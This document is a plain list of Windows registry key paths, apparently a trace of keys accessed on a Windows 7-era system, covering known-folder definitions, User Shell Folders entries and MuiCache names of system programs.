HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\PropertyBag
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Programs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuSubFolders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\PropertyBag
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Common Start Menu
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\sud.dll,-1
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\wucltux.dll,-1
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\ehome\ehres.dll,-100
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Program Files\Windows Sidebar\sidebar.exe,-1005
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\WindowsAnytimeUpgradeUI.exe,-1
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Program Files\DVD Maker\DVDMaker.exe,-61403
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\FXSRESM.dll,-114
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\unregmp2.exe,-4
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\XpsRchVw.exe,-102
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\displayswitch.exe,-320
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Program Files\Common Files\Microsoft Shared\Ink\mip.exe,-291
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\mblctr.exe,-1008
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\NetProjW.dll,-501
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\mstsc.exe,-4000
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\SnippingTool.exe,-15051
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\SoundRecorder.exe,-100
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\SNTSearch.dll,-505
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\System32\SyncCenter.dll,-3000
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\OobeFldr.dll,-33056
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\Speech\SpeechUX\sapi.cpl,-5555
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\dfrgui.exe,-103
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\wdc.dll,-10030
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\msinfo32.exe,-100
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\rstrui.exe,-100
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\miguiresource.dll,-201
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\migwiz\wet.dll,-591
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\migwiz\wet.dll,-588
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Program Files\Common Files\Microsoft Shared\Ink\ShapeCollector.exe,-298
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Program Files\Common Files\Microsoft Shared\Ink\TipTsf.dll,-80
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Program Files\Windows Journal\Journal.exe,-3074
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe,-102
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe,-101
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\comres.dll,-3410
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\mycomput.dll,-300
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\odbcint.dll,-1310
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\miguiresource.dll,-101
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\iscsicpl.dll,-5001
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\MdSched.exe,-4001
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\wdc.dll,-10021
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\pmcsnap.dll,-700
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\wsecedit.dll,-718
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\filemgmt.dll,-2204
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\msconfig.exe,-126
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\System32\AuthFWGP.dll,-20
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\gameux.dll,-10082
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\sdcpl.dll,-101
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\recdisc.exe,-2000
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\msra.exe,-100
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Common Programs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Common Desktop
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\PropertyBag
HKEY_CLASSES_ROOT\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\SortOrderIndex
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\PropertyBag
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}
